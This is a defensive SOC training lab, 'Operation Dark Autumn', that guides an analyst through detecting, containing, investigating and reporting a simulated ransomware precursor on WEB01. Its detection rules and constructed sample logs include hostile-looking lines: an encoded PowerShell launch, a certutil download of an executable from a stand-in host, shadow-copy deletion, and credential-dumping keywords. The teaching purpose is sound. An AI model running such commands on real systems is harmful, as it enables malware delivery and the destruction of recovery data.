Advanced AI-Assisted Capstone

L20: Full SOC Simulation — Capstone Scenario

You're the on-call analyst. An alert fires at 2am. Work a complete SOC scenario from initial triage through containment, forensic investigation, threat intelligence enrichment, and executive reporting — using every VM and tool in your lab. This is the full kill-chain, end to end.

Tools: all lab VMs, Splunk, Volatility 3, Wireshark, YARA, MITRE ATT&CK

SCENARIO BRIEF — READ FIRST
Scenario: Operation Dark Autumn

Situation: It's 02:14 UTC on a Tuesday. Your Splunk SIEM fires a Priority-1 alert: "Potential ransomware pre-cursor — shadow copy deletion attempt detected on WEB01."

Environment:

  • Kali Linux (192.168.56.10) — your analyst workstation
  • SIFT Workstation (192.168.56.20) — forensics platform
  • Metasploitable (192.168.56.101) — stands in for the compromised WEB01 on the network; the Windows log, memory and disk artifacts for WEB01 come from the Lab L13/L14 practice images
  • REMnux (malware-net) — isolated malware analysis environment

What you know so far:

  • Splunk alert triggered by Event ID 4688 (process creation; the command line is only present because command-line auditing is enabled on WEB01) — vssadmin delete shadows /all /quiet executed by user svc_backup
  • Source workstation: WEB01 (192.168.56.101)
  • Time: 02:07 UTC (7 minutes before you saw the alert)
  • svc_backup is a legitimate backup service account — but should NEVER run vssadmin

Your mission: Triage → Investigate → Contain → Hunt → Report. Complete all 14 steps and produce a full incident report.

Phase 1: Initial Triage (0–15 minutes)
1 Acknowledge alert and assess initial scope

First action — characterize the alert and determine if it's a true positive:

```spl
# Splunk — expand context around the triggering event
index=wineventlog host=WEB01 earliest=-30m@m latest=now
    EventCode IN (4688, 4698, 4625, 4624, 4672, 7045)
| sort _time
| eval time=strftime(_time, "%H:%M:%S")
| table time, EventCode, Account_Name, Process_Name, Command_Line, Logon_Type

# Quick check: has svc_backup ever run vssadmin before? (baseline the account over 90 days;
# bucket by day rather than date_mday, which repeats across months)
index=wineventlog host=WEB01 Account_Name=svc_backup Command_Line="*vssadmin*" earliest=-90d@d
| bin _time span=1d
| stats count by _time, Command_Line
```

Triage Decision

| Question | Answer |
|---|---|
| True positive or false positive? | |
| Was this the first such event? | |
| Any other hosts affected? | |
| Severity assessment | |
2 Splunk — build the attack timeline

Expand the investigation window — look for the full attack chain on WEB01:

```spl
# Look for what happened BEFORE the vssadmin command (precursor activity).
# case() returns the first matching label, so order matters.
index=wineventlog host=WEB01 earliest=-2h@h latest=+30m@m
| eval suspicious=case(
    EventCode=4698, "Scheduled Task Created",
    EventCode=7045, "New Service Installed",
    match(Command_Line, "(?i)powershell.*-enc"), "Encoded PS",
    match(Command_Line, "(?i)(mimikatz|sekurlsa|lsadump)"), "Credential Dump",
    match(Command_Line, "(?i)vssadmin.*delete"), "Shadow Delete",
    match(Command_Line, "(?i)(net user|net localgroup)"), "Account Mgmt",
    match(Command_Line, "(?i)(curl|wget|certutil|bitsadmin).*http"), "Download",
    true(), null())
| where isnotnull(suspicious)
| table _time, suspicious, Account_Name, Command_Line
| sort _time

# Also check for lateral movement FROM WEB01: network (type 3) logons on any host
# whose source address is WEB01's IP; host is the system that received the logon
index=wineventlog EventCode=4624 Logon_Type=3 Source_Network_Address=192.168.56.101 earliest=-4h@h
| table _time, host, Account_Name, Workstation_Name
| sort _time
```
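The two searches above run inside Splunk. The same triage logic as an added example, not part of the lab's own scripts, written in Python so it can be run offline and checked: it applies the step-2 case() rules in the same order, builds the WEB01 timeline, estimates dwell time from the first precursor to the shadow-copy deletion, lists type-3 logons sourced from WEB01's IP, and runs the step-1 "has this account done this before" baseline. The event lines are constructed for this example (Splunk Windows TA field names; 203.0.113.44 is a TEST-NET address standing in for the download host).

```python
"""Offline version of the step-1/step-2 Splunk triage (added example, not the
lab's own code). Events are 'key=value' lines with Splunk Windows TA field
names; the sample below is constructed for this example."""
import re
from datetime import datetime

# Same rules, same evaluation order, as the case() statement in the step-2 search.
# The PowerShell rule also accepts -e / -ec / -EncodedCommand, but not -ep or -exec.
RULES = [
    ("Encoded PS",      re.compile(r"powershell.*\s-e(c|nc|ncodedcommand)?\b", re.I)),
    ("Credential Dump", re.compile(r"mimikatz|sekurlsa|lsadump", re.I)),
    ("Shadow Delete",   re.compile(r"vssadmin.*delete", re.I)),
    ("Account Mgmt",    re.compile(r"net (user|localgroup)", re.I)),
    ("Download",        re.compile(r"(curl|wget|certutil|bitsadmin).*http", re.I)),
]
ALERT_LABEL = "Shadow Delete"   # the label that fired the P1 alert

# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = """\
time=2024-10-15T01:52:10Z host=WEB01 EventCode=4688 Account_Name=svc_backup Command_Line="C:\\Windows\\System32\\cmd.exe /c whoami"
time=2024-10-15T01:55:42Z host=WEB01 EventCode=4688 Account_Name=svc_backup Command_Line="powershell.exe -nop -w hidden -enc SQBFAFgA"
time=2024-10-15T02:01:05Z host=WEB01 EventCode=4698 Account_Name=svc_backup Command_Line=""
time=2024-10-15T02:03:30Z host=WEB01 EventCode=4688 Account_Name=svc_backup Command_Line="certutil.exe -urlcache -f http://203.0.113.44/u.exe C:\\ProgramData\\u.exe"
time=2024-10-15T02:07:00Z host=WEB01 EventCode=4688 Account_Name=svc_backup Command_Line="vssadmin delete shadows /all /quiet"
time=2024-10-15T02:07:11Z host=WEB01 EventCode=4688 Account_Name=svc_backup Command_Line="vssadmin list shadows"
time=2024-10-15T02:08:00Z host=DC01 EventCode=4624 Account_Name=svc_backup Logon_Type=3 Source_Network_Address=192.168.56.101
"""

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Split one 'key=value key="quoted value"' line into a dict with a parsed _time."""
    ev = {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(line)}
    ev["_time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
    return ev

def parse_events(raw):
    return [parse_event(l) for l in raw.splitlines() if l.strip()]

def classify(ev):
    """Label an event the way the step-2 case() does; None if nothing matched."""
    if ev.get("EventCode") == "4698":
        return "Scheduled Task Created"
    if ev.get("EventCode") == "7045":
        return "New Service Installed"
    cmd = ev.get("Command_Line", "")
    for label, rx in RULES:
        if rx.search(cmd):
            return label
    return None

def build_timeline(raw, host="WEB01"):
    """(time, label, account, command) for every suspicious event on host, oldest first."""
    hits = []
    for ev in parse_events(raw):
        label = classify(ev)
        if ev.get("host") == host and label:
            hits.append((ev["_time"], label, ev["Account_Name"], ev.get("Command_Line", "")))
    return sorted(hits)

def dwell_seconds(raw, host="WEB01"):
    """Seconds from the first precursor to the event that fired the alert; None if no alert event."""
    tl = build_timeline(raw, host)
    alert = [t for t, label, _, _ in tl if label == ALERT_LABEL]
    if not tl or not alert:
        return None
    return (alert[0] - tl[0][0]).total_seconds()

def lateral_from(raw, src_ip="192.168.56.101"):
    """Type-3 (network) logons on any host whose source address is src_ip."""
    return [(ev["_time"], ev["host"], ev["Account_Name"]) for ev in parse_events(raw)
            if ev.get("EventCode") == "4624" and ev.get("Logon_Type") == "3"
            and ev.get("Source_Network_Address") == src_ip]

def baseline_count(raw, account, pattern, before):
    """How often account ran a command matching pattern before the given time (step-1 baseline)."""
    rx = re.compile(pattern, re.I)
    return sum(1 for ev in parse_events(raw)
               if ev.get("Account_Name") == account and ev["_time"] < before
               and rx.search(ev.get("Command_Line", "")))

if __name__ == "__main__":
    for t, label, acct, cmd in build_timeline(SAMPLE_EVENTS):
        print(f"{t:%H:%M:%S}  {label:24} {acct:12} {cmd}")
    print("dwell (s):", dwell_seconds(SAMPLE_EVENTS))
    print("lateral:", lateral_from(SAMPLE_EVENTS))
    print("svc_backup vssadmin runs before the alert:",
          baseline_count(SAMPLE_EVENTS, "svc_backup", r"vssadmin", datetime(2024, 10, 15, 2, 7)))
```

On the constructed sample the timeline is Encoded PS, Scheduled Task Created, Download, Shadow Delete, with 11 minutes 18 seconds between the first precursor and the alerting event, one network logon to DC01 from WEB01's address, and no earlier vssadmin use by svc_backup. The `vssadmin list shadows` line is deliberately not flagged: the rule is `vssadmin.*delete`, which is also why a real baseline search should look at all vssadmin use, not only deletions.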
3 Network capture — identify C2 communications

From Kali, capture traffic and look for C2 beaconing patterns:

```bash
mkdir -p ~/capstone

# Start a tshark capture focused on WEB01 (runs in the background; stop it with pkill tshark)
sudo tshark -i eth1 -f "host 192.168.56.101" -w ~/capstone/WEB01_traffic.pcap &

# Analyze an existing capture. Keep only outbound SYNs so each row is one connection
# attempt rather than one packet; otherwise a single long HTTPS session dominates the counts.
tshark -r ~/capstone/WEB01_traffic.pcap \
    -Y "ip.src == 192.168.56.101 && tcp.flags.syn == 1 && tcp.flags.ack == 0" \
    -T fields -e frame.time_epoch -e ip.src -e ip.dst -e tcp.dstport -e frame.len \
    -E header=y -E separator=, \
| python3 -c "$(cat <<'EOF'
import sys, csv, collections
reader = csv.DictReader(sys.stdin)
dst_count = collections.Counter()
for row in reader:
    dst_count[f"{row['ip.dst']}:{row['tcp.dstport']}"] += 1
print("Top outbound connections from WEB01:")
for dest, count in dst_count.most_common(15):
    print(f"  {count:5d}x {dest}")
EOF
)"

# Check for C2 beaconing (regular interval connections)
python3 ~/network-lab/beacon_detect.py 2>/dev/null || \
    echo "Run the beacon detection script from Lab L06 on WEB01_traffic.pcap"
```
| Finding | Details |
|---|---|
| Suspicious outbound IP | |
| Beacon interval detected | |
| Total C2 connections | |
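What the Lab L06 beacon detector has to do, as an added example that is not that script: take one row per outbound connection (the CSV the tshark command above emits), group by destination and port, and flag destinations whose inter-connection gaps are regular. The regularity measure here is the coefficient of variation (standard deviation divided by mean) of the gaps, which sits near zero for a timer-driven beacon and well above it for human-driven traffic. The flow rows are constructed; 203.0.113.44 (TEST-NET) stands in for the C2 address, and the thresholds are this example's choices.

```python
"""Beacon detection over per-connection flow rows (added example; not the lab's
Lab L06 beacon_detect.py). Input is the CSV produced by
  tshark -T fields -e frame.time_epoch -e ip.src -e ip.dst -e tcp.dstport -e frame.len -E header=y -E separator=,
filtered to one row per connection (outbound SYNs). The rows below are constructed;
203.0.113.44 (TEST-NET) stands in for the C2 address."""
import csv
import io
import statistics
from collections import Counter, defaultdict

MIN_CONNECTIONS = 6   # fewer than this and the interval statistics mean nothing
MAX_CV = 0.15         # stdev/mean of the gaps; a 60 s beacon with a few seconds of jitter is ~0.03

SAMPLE_CSV = """\
frame.time_epoch,ip.src,ip.dst,tcp.dstport,frame.len
1728957600.101,192.168.56.101,203.0.113.44,443,74
1728957605.330,192.168.56.101,192.168.56.1,80,74
1728957617.002,192.168.56.101,192.168.56.1,80,74
1728957661.287,192.168.56.101,203.0.113.44,443,74
1728957719.910,192.168.56.101,203.0.113.44,443,74
1728957740.015,192.168.56.101,192.168.56.1,80,74
1728957750.404,192.168.56.101,192.168.56.1,80,74
1728957781.122,192.168.56.101,203.0.113.44,443,74
1728957840.550,192.168.56.101,203.0.113.44,443,74
1728957902.061,192.168.56.101,203.0.113.44,443,74
1728957959.733,192.168.56.101,203.0.113.44,443,74
1728958000.200,192.168.56.101,192.168.56.1,80,74
1728958005.118,192.168.56.101,192.168.56.1,80,74
1728958021.480,192.168.56.101,203.0.113.44,443,74
1728958200.007,192.168.56.101,10.0.0.5,445,74
1728958250.300,192.168.56.101,10.0.0.5,445,74
1728958300.900,192.168.56.101,192.168.56.1,80,74
1728957800.000,192.168.56.10,192.168.56.101,22,74
"""

def parse_flows(text, src="192.168.56.101"):
    """Group connection timestamps by (dst, dport) for connections initiated by src."""
    flows = defaultdict(list)
    for row in csv.DictReader(io.StringIO(text)):
        if row["ip.src"] == src and row["tcp.dstport"]:
            flows[(row["ip.dst"], row["tcp.dstport"])].append(float(row["frame.time_epoch"]))
    return flows

def top_destinations(flows, n=15):
    """Connection counts per destination, most frequent first (the step-3 Counter output)."""
    return Counter({dst: len(ts) for dst, ts in flows.items()}).most_common(n)

def interval_stats(times):
    """Return (mean_gap_seconds, cv) of the inter-connection gaps, or None if there are too few."""
    ts = sorted(times)
    gaps = [b - a for a, b in zip(ts, ts[1:]) if b > a]   # drop zero gaps from duplicate rows
    if len(gaps) < MIN_CONNECTIONS - 1:
        return None
    mean = statistics.fmean(gaps)
    return mean, statistics.pstdev(gaps) / mean

def detect_beacons(flows):
    """Destinations whose connection timing is regular enough to look like a beacon."""
    found = []
    for dst, times in flows.items():
        st = interval_stats(times)
        if st and st[1] <= MAX_CV:
            found.append({"dst": dst, "connections": len(times),
                          "period_s": round(st[0], 1), "cv": round(st[1], 3)})
    return sorted(found, key=lambda f: f["cv"])

if __name__ == "__main__":
    flows = parse_flows(SAMPLE_CSV)
    print("Top outbound connections from WEB01:")
    for (ip, port), count in top_destinations(flows):
        print(f"  {count:5d}x {ip}:{port}")
    for b in detect_beacons(flows):
        print(f"BEACON? {b['dst'][0]}:{b['dst'][1]} every ~{b['period_s']}s "
              f"(cv={b['cv']}, n={b['connections']})")
```

On the sample, 203.0.113.44:443 is reported with a period of about 60 seconds while the irregular web traffic to 192.168.56.1 and the two SMB connections are not. Two limits worth knowing before trusting this on a real capture: an implant that adds large random jitter (30% or more) pushes the cv above a tight threshold, so a gap-histogram or median-based check is more robust, and a beacon that holds one long-lived TCP session open never produces periodic SYNs at all, so long connections need a separate duration check.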
Phase 2: Containment (15–30 minutes)
4 Contain the compromised host

Isolate WEB01 while preserving evidence — do not shut it down yet (live memory needed):

```bash
# Option 1: isolate at the hypervisor. On a flat host-only network Kali is NOT WEB01's
# gateway, so firewall rules on Kali do nothing to WEB01's traffic to the other VMs;
# the virtual NIC is the only real choke point. Note that "host-only" alone only
# removes internet access, WEB01 can still reach every VM on the same vboxnet.
# VBoxManage controlvm "WEB01" setlinkstate1 off            # pull the virtual cable
# VBoxManage controlvm "WEB01" nic1 intnet forensics-net     # or an internal net shared only with SIFT

# Option 2: if Kali is routing WEB01's traffic (Kali as gateway), block forwarding
# except to the SIFT evidence collector. Modern iptables puts the negation before the flag.
sudo iptables -I FORWARD -s 192.168.56.101 ! -d 192.168.56.20 -j DROP
sudo iptables -I FORWARD -d 192.168.56.101 ! -s 192.168.56.20 -j DROP
# FORWARD does not cover Kali's own traffic; block that too so the check below is meaningful
sudo iptables -I INPUT  -s 192.168.56.101 -j DROP
sudo iptables -I OUTPUT -d 192.168.56.101 -j DROP

# Verify isolation from Kali (should fail)
ping -c 1 -W 2 192.168.56.101 && echo "WARNING: WEB01 still reachable from Kali"

# Document the containment action in the incident log
echo "$(date -u) — WEB01 network-isolated. Traffic restricted to SIFT only." >> ~/capstone/incident_log.txt
echo "$(date -u) — Analyst: $(whoami). Reason: Ransomware pre-cursor activity confirmed." >> ~/capstone/incident_log.txt
```
5 Acquire volatile memory from WEB01 (live forensics)

Capture RAM before any shutdown — this contains running processes, network connections, and encryption keys in memory:

```bash
# If WinPMem is available on WEB01: run it as Administrator and write the image to
# removable or network evidence storage, never to WEB01's own system disk, then hash it.
#   On WEB01:  winpmem_mini_x64_rc2.exe E:\evidence\WEB01_memory.raw
#              certutil -hashfile E:\evidence\WEB01_memory.raw SHA256

# Lab simulation: use an existing memory image from Lab L13
ls ~/memory-lab/*.raw ~/memory-lab/*.vmem 2>/dev/null || \
    echo "Memory image needed — see Lab L13 setup for acquisition steps"

# Initial triage on the memory image (Volatility 3)
mkdir -p ~/capstone
cd ~/memory-lab
python3 vol.py -f evidence.raw windows.pslist.PsList   | tee ~/capstone/pslist.txt
python3 vol.py -f evidence.raw windows.netscan.NetScan | tee ~/capstone/netscan.txt
python3 vol.py -f evidence.raw windows.malfind.Malfind | tee ~/capstone/malfind.txt
echo "Memory triage complete"
wc -l ~/capstone/*.txt
```
Phase 3: Deep Forensic Investigation (30–90 minutes)
6 Volatility — identify injected malicious code
```bash
# Volatility 3 — malware-specific investigation
cd ~/memory-lab
mkdir -p ~/capstone/dumps

# Suspicious processes: script hosts and LOLBins, shown with their parent chain
# (an odd parent, e.g. a web server worker spawning cmd.exe, is the tell)
python3 vol.py -f evidence.raw windows.pstree.PsTree | \
    grep -iE "(cmd|powershell|wscript|cscript|mshta|regsvr32|rundll32)\.exe"

# Live network connections only (netscan also lists closed and half-closed sockets)
python3 vol.py -f evidence.raw windows.netscan.NetScan | \
    grep -E "(ESTABLISHED|LISTENING)"

# Dump the regions malfind flagged (private RWX memory with a PE header or code-like bytes).
# DumpFiles only extracts file-backed objects, so it would miss injected code;
# malfind --dump writes out the flagged VAD regions themselves.
SUSPECT_PID=1234   # replace with the PID from the malfind output
python3 vol.py -f evidence.raw -o ~/capstone/dumps/ \
    windows.malfind.Malfind --pid $SUSPECT_PID --dump

# Strings from the dumped regions: ASCII and UTF-16LE (most Windows strings are wide)
{ strings -n 8 ~/capstone/dumps/*.dmp; strings -n 8 -e l ~/capstone/dumps/*.dmp; } | \
    grep -iE "(https?://|cmd\.exe|powershell|vssadmin|\.onion|bitcoin)" | \
    sort -u | tee ~/capstone/memory_strings.txt
echo "Suspicious strings from memory:"
head -30 ~/capstone/memory_strings.txt
```
7 Disk forensics — find malware dropper and persistence
```bash
# On SIFT — analyze the WEB01 disk image (in the lab, use the practice image from Lab L14,
# mounted read-only at ~/disk-lab/mount)
cd ~/disk-lab
MNT=~/disk-lab/mount
REF=$MNT/Windows/System32/kernel32.dll   # baseline: newer than the OS install counts as "recent"

# Check Run/RunOnce keys for persistence (lab registry parser from L14)
python3 parse_registry.py

# Recently modified executables in common drop locations. -newer compares mtime,
# which an attacker can timestomp, so treat this as a first pass, not proof.
find $MNT/Windows/Temp $MNT/ProgramData $MNT/Users/*/AppData/Roaming \
    -type f -iname "*.exe" -newer "$REF" 2>/dev/null | tee ~/capstone/suspicious_exes.txt
echo "Recently dropped executables:"
cat ~/capstone/suspicious_exes.txt

# New scheduled tasks (XML task definitions; cross-check with the 4698 events from step 2)
find $MNT/Windows/System32/Tasks -type f -newer "$REF" 2>/dev/null | head -20
```
8 Malware analysis — identify the ransomware family

On REMnux — analyze the dropped executable to identify the malware family:

```bash
# On REMnux (isolated malware-net) — transfer the sample from SIFT via the shared folder.
# Hash it on SIFT before and on REMnux after the transfer; the hashes must match.

# Static analysis
file ~/capstone/malware_sample.exe
sha256sum ~/capstone/malware_sample.exe | tee ~/capstone/sample_hash.txt

# Extract strings (FLOSS also recovers stack and decoded strings; fall back to plain strings)
floss ~/capstone/malware_sample.exe > ~/capstone/floss_strings.txt 2>/dev/null || \
    strings ~/capstone/malware_sample.exe > ~/capstone/floss_strings.txt

# List imports with pefile
python3 << 'EOF'
import os, sys
import pefile

exe = os.path.expanduser('~/capstone/malware_sample.exe')
if not os.path.exists(exe):
    print("Place malware sample at ~/capstone/malware_sample.exe")
    print("For the lab: use any sample EXE from your Lab L04 exercises")
    sys.exit(1)

pe = pefile.PE(exe)
print("=== IMPORTS ===")
# A packed sample imports almost nothing (LoadLibrary/GetProcAddress); unpack it before judging
for entry in getattr(pe, 'DIRECTORY_ENTRY_IMPORT', []):
    dll = entry.dll.decode('utf-8', errors='replace')
    apis = [imp.name.decode('utf-8', errors='replace') for imp in entry.imports if imp.name]
    print(f"\n{dll}")
    for api in apis[:10]:
        print(f"  {api}")
EOF

# YARA scan against the lab's ransomware rules and the signature-base collection
yara -r ~/yara-lab/rules/04_ransomware.yar ~/capstone/malware_sample.exe 2>/dev/null
yara -r ~/yara-lab/rule_sources/signature-base/yara/ ~/capstone/malware_sample.exe 2>/dev/null | head -20
```
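Listing imports is only useful if you then ask what the combination implies. The following is an added example, not part of the lab or of pefile: it maps imported APIs to capability clusters (file enumeration plus encryption plus overwrite is the ransomware shape; VirtualAllocEx plus WriteProcessMemory plus CreateRemoteThread is the injector shape) and calls out the packed case, where the import table is nearly empty and says nothing. The API-to-capability map is this example's own heuristic, not a signature, and the import tables are constructed so the logic runs without a sample; `load_imports` reads a real file with pefile when you have one.

```python
"""Import-table capability triage for the step-8 static analysis (added example,
not part of the lab or of pefile). Import tables here are constructed; the
capability map is a heuristic about what the binary CAN do, not a verdict on
what it does."""

# API names without the A/W suffix; imports are normalized the same way below
CAPABILITIES = {
    "file-encryption":   {"CryptAcquireContext", "CryptGenKey", "CryptEncrypt", "CryptImportKey",
                          "BCryptGenerateSymmetricKey", "BCryptEncrypt"},
    "file-enumeration":  {"FindFirstFile", "FindNextFile", "GetLogicalDrives", "GetDriveType"},
    "file-overwrite":    {"WriteFile", "MoveFileEx", "DeleteFile", "SetFileAttributes"},
    "spawn-process":     {"CreateProcess", "ShellExecute", "WinExec"},   # how vssadmin/wbadmin get run
    "process-injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                          "NtUnmapViewOfSection", "SetThreadContext", "QueueUserAPC"},
    "anti-analysis":     {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"},
    "network":           {"InternetOpen", "InternetConnect", "HttpSendRequest", "WSAStartup", "connect", "send"},
}
RUNTIME_RESOLVERS = {"LoadLibrary", "GetProcAddress"}
MIN_IMPORTS = 10   # below this, with the resolvers present, assume the real imports are resolved at runtime

# Constructed import tables (dll -> APIs), shaped like pefile's DIRECTORY_ENTRY_IMPORT
SAMPLE_IMPORTS = {
    "kernel32.dll": ["FindFirstFileW", "FindNextFileW", "GetLogicalDrives", "WriteFile",
                     "MoveFileExW", "DeleteFileW", "CreateProcessW", "IsDebuggerPresent",
                     "GetTickCount", "CloseHandle"],
    "advapi32.dll": ["CryptAcquireContextW", "CryptGenKey", "CryptEncrypt"],
    "wininet.dll":  ["InternetOpenW", "HttpSendRequestW"],
}
PACKED_IMPORTS = {"kernel32.dll": ["LoadLibraryA", "GetProcAddress", "VirtualProtect", "VirtualAlloc"]}

def normalize(imports):
    """Flatten to a set of API names with a trailing A/W (ANSI/wide) suffix removed."""
    apis = set()
    for names in imports.values():
        for n in names:
            apis.add(n[:-1] if len(n) > 2 and n[-1] in "AW" and n[-2].islower() else n)
    return apis

def triage(imports):
    """Capability clusters present in the import table, plus a one-line verdict."""
    apis = normalize(imports)
    caps = {cap: sorted(apis & names) for cap, names in CAPABILITIES.items() if apis & names}
    total = sum(len(v) for v in imports.values())
    if total < MIN_IMPORTS and RUNTIME_RESOLVERS <= apis:
        verdict = "likely packed: imports resolved at runtime, unpack before trusting this"
    elif {"file-encryption", "file-enumeration", "file-overwrite"} <= caps.keys():
        verdict = "ransomware-like: enumerates, encrypts and overwrites files"
    elif len(caps.get("process-injection", [])) >= 3:
        verdict = "injector: allocates, writes and executes in a remote process"
    else:
        verdict = "inconclusive: review the capability list and the strings"
    return {"import_count": total, "capabilities": caps, "verdict": verdict}

def load_imports(path):
    """Read the import table of a real PE with pefile (not needed for the samples above)."""
    import pefile
    pe = pefile.PE(path)
    table = {}
    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        dll = entry.dll.decode("utf-8", "replace").lower()
        table[dll] = [imp.name.decode("utf-8", "replace") for imp in entry.imports if imp.name]
    return table

if __name__ == "__main__":
    for name, table in (("sample", SAMPLE_IMPORTS), ("packed", PACKED_IMPORTS)):
        r = triage(table)
        print(f"{name}: {r['import_count']} imports, verdict: {r['verdict']}")
        for cap, hits in r["capabilities"].items():
            print(f"  {cap:18} {', '.join(hits)}")
```

The constructed sample comes out ransomware-like; the packed table comes out as "unpack first", which is the honest answer for most real ransomware droppers and the reason the YARA scans above should also be run against the memory dumps from step 6, where the unpacked code lives. To triage a real file, replace the constructed table with `triage(load_imports(os.path.expanduser("~/capstone/malware_sample.exe")))`.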
Phase 4: Threat Intelligence & Hunting (90–120 minutes)
9 Enrich IOCs and identify threat actor
```bash
# Enrich all IOCs from this incident. OPSEC: query third-party sources only; never connect
# to the C2 address from any host, and don't upload the sample to a public sandbox before
# the incident lead approves it (the actor may be watching for submissions).
cd ~/tip-lab
source ~/.tip_keys   # API keys used by the lab's enrichment script

# Enrich C2 IP(s) and the sample hash (IOC list on stdin, in the format enrich_iocs.py from the TIP lab expects)
python3 enrich_iocs.py << 'EOF'
# Add your IOCs here
ioc_list = [
    {"value": "YOUR_C2_IP_HERE", "type": "ip"},
    {"value": "YOUR_MALWARE_HASH_HERE", "type": "hash_sha256"},
]
EOF

# Check whether the C2 IP is known to Shodan InternetDB (no API key needed; returns
# a {"detail": ...} body instead of ports/tags/vulns when the IP has no record)
python3 - <<'EOF'
import json, subprocess
c2_ip = '185.234.219.44'   # replace with your finding
result = subprocess.run(['curl', '-s', f'https://internetdb.shodan.io/{c2_ip}'],
                        capture_output=True, text=True)
data = json.loads(result.stdout or '{}')
print(f'Shodan InternetDB: {c2_ip}')
if 'ports' not in data:
    print(f"  no record: {data.get('detail', 'empty response')}")
else:
    print(f"  Open ports: {data.get('ports', [])}")
    print(f"  Hostnames:  {data.get('hostnames', [])}")
    print(f"  Tags:       {data.get('tags', [])}")
    print(f"  Vulns:      {data.get('vulns', [])}")
EOF
```
| IOC | Type | Risk Score | Attribution |
|---|---|---|---|
| | IP | | |
| | Hash | | |
10 Threat hunt — search for lateral movement across all hosts
```spl
# Splunk — hunt for the same malware across other hosts:
# same C2 IP, same malware hash, or same TTPs on other endpoints

# Hunt 1: any host communicating with the C2 IP, with first/last seen for the timeline
index=network dest_ip=185.234.219.44
| stats count, min(_time) as first_seen, max(_time) as last_seen by src_ip, dest_port
| sort -count

# Hunt 2: same encoded PowerShell pattern on other hosts
index=wineventlog EventCode=4688 NOT host=WEB01
    (Command_Line="*-enc*" OR Command_Line="*EncodedCommand*")
| stats count by host, Account_Name
| sort -count

# Hunt 3: vssadmin delete on any host
index=wineventlog Command_Line="*vssadmin*delete*"
| table _time, host, Account_Name, Command_Line
| sort _time

# Hunt 4: YARA scan across endpoints (if Velociraptor or osquery is deployed)
# velociraptor -v artifacts collect Windows.Detection.Yara.Process \
#     --args Rules="$(cat ~/yara-lab/rules/04_ransomware.yar)"
```
Phase 5: Eradication & Recovery (120–150 minutes)
11 Eradication — remove malware and persistence mechanisms

Document the eradication plan based on your forensic findings:

| Artifact | Location | Removal Action |
|---|---|---|
| | | |
12 Map full kill chain to MITRE ATT&CK
| Stage | Activity Observed | ATT&CK Technique |
|---|---|---|
| Initial Access | | |
| Execution | | T1059.001 — PowerShell |
| Persistence | | T1053.005 — Scheduled Task |
| Privilege Escalation | | |
| Defense Evasion | Encoded PowerShell | T1027 — Obfuscated Files or Information |
| Credential Access | | T1003 — OS Credential Dumping |
| Lateral Movement | | |
| Impact | vssadmin delete shadows | T1490 — Inhibit System Recovery |
| C2 | | T1071.001 — Web Protocols |
Phase 6: Reporting (150–180 minutes)
13 Write technical incident report

Use the AI analyst to help write your full technical report. Include all evidence, IOCs, and timeline.

Incident Summary

| Field | Value |
|---|---|
| Incident ID | |
| Detection time | |
| Containment time | |
| Malware family | |
| Hosts confirmed compromised | |
| Data encrypted | |
| Root cause | |
| IOCs (key) | |
14 Executive briefing and lessons learned

Present a 1-page executive summary and identify detection/prevention gaps. Ask the AI analyst to help draft the executive brief.

Lessons Learned

| Gap Identified | Recommendation | Priority |
|---|---|---|
| | | |

🎓 All 20 Labs Complete!

Congratulations — you've completed every lab in the CyberSec Pro Academy program.
